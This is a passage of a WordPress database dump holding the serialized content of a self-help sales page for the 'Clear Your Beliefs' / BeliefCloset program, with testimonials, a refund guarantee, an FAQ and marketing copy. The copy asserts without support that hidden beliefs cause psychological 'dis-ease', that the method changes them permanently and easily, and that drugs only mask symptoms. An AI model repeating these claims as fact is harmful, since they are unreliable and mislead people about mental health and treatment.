class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb-purch">\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd"><button class="btn first" style="padding: 10px 20px;">Purchase</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1574, 2023, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60567:"<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" 